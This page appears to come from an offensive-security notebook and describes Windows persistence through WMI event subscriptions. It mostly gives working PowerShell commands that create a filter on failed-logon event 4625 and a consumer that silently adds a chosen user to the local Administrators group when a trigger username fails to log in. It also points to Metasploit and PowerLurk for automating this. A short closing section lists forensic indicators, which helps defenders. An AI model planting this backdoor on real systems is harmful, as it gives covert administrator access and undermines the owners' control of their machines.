> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/persistence/windows-persistence-1/wmi-persist-with-event-filters.md).

# WMI Persist With Event Filters

### Automation

* There are many great automated ways to do this.
* <https://github.com/Sw4mpf0x/PowerLurk>
* Metasploit post module `exploit/windows/local/wmi_persistence`

```
Basic options:
  Name                Current Setting  Required  Description
  ----                ---------------  --------  -----------
  CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
  CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
  EVENT_ID_TRIGGER    4625             yes       Event ID to trigger the payload. (Default: 4625)
  PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
  PROCESS_TRIGGER     CALC.EXE         yes       The process name to trigger the payload. (Default: CALC.EXE)
  SESSION                              yes       The session to run this module on.
  USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
  WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)

```

### Manual Mode

* Check if WMI is enabled, if it is not any `WMI` command that you execute will attempt to download `WMI`
* This download process does log in the `WMI Log`
* Check if WMI is enabled on the remote system

```
reg query "HKLM\System\CurrentControlSet\Services\Winmgt"
Start        REG_DWORD        0x2

0x2 --> Auto Start
0x3 --> Demand Start
0x4 --> Disabled

#OR
get-service Winmgmt
```

*

```
<figure><img src="../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
```

#### Check for existing entries

* Check for existing event filter consumer bindings that are on the system

```
Get-Wmiobject -Class __FilterToConsumerBinding -NameSpace "root\Subscription"
```

#### Ensure the system is logging event logs for the type of event you want to use

* **- i.e. logon, logoff event**

```
auditpol /get /category:*
#OR for logon logoff 
auditpol /get /category:Logon/Logoff

--output--
System audit policy
Category/Subcategory                      Setting
Logon/Logoff
  Logon                                   Success and Failure
  Logoff                                  Success
  Account Lockout                         Success
  IPsec Main Mode                         No Auditing
  IPsec Quick Mode                        No Auditing
  IPsec Extended Mode                     No Auditing
  Special Logon                           Success
  Other Logon/Logoff Events               No Auditing
  Network Policy Server                   Success and Failure
  User / Device Claims                    No Auditing
  Group Membership                        No Auditing
```

#### Create your own filter and consumer

```
$x='SCM System Log Filter'
$z='SCM System Log Consumer'
```

#### Now create the triggering event

```
$q='Select * from __InstanceCreationEvent WITHIN 10 where TargetInstance isa 'Win32-NtLogEvent' and TargetInstance.logfile='Security' and (TargetInstance.EventCode='4625')"
```

#### Now create your event filter

```
$wmifilter=Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$x;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$q} ErrorAction Stop
```

#### Create the event consumer

```
$wmiconsumer=Set-WmiInstance -Class CommandLineEventConsumer -NameSpace "root\subscription" -Arguments @{Name=$z;CommandLineTemplate='C:\\Windows\\System32\\windowspowershell\\v.1.0\\powershell.exe -v 2.0 -nop -c "if(wevtutil qe security /rd:true /f:text /c:1 `"*[System/EventID=4625]`" | findstr /i "fake username here"){net localgroup Administrators <localuser> /add}"'}
```

#### Combine the filter and the comsumer

```
Set-WmiInstance -Class __FilterToConsumerBinding -NameSpace "root\subscription" -Arguments @{Filter=$wmifilter;Consumer=$wmiconsumer}
```

#### Ensure Its all working and correct

```
Get-WmiObject -Class __FilterToConsumerBinding -NameSpace "root\subscription"
```

### IOCs Left Behind

```
C:\Windows\System32\Wbem\Repository\INDEX.BTR
- Cotnains the names of event filter and event consumer 
C:\Windows\System32\Wbem\Repository\OBJECTS.DATA
- Contains the names of event filter and event comsumer 
- Contains the command in the event consumer 
C:\Windows\System32\Wbem\Repository\MAPPING2.MAP
- Prefetch Files
"HKLM\Software\Microsoft\Wbem\Ess\//./root\CIMV2\MS_NT_EVENT_LOG_EVENT_PROVIDER"
```

#### Other Logs

```
5857 Active ScriptEventConsumer provider started with result code 0x0
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/persistence/windows-persistence-1/wmi-persist-with-event-filters.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.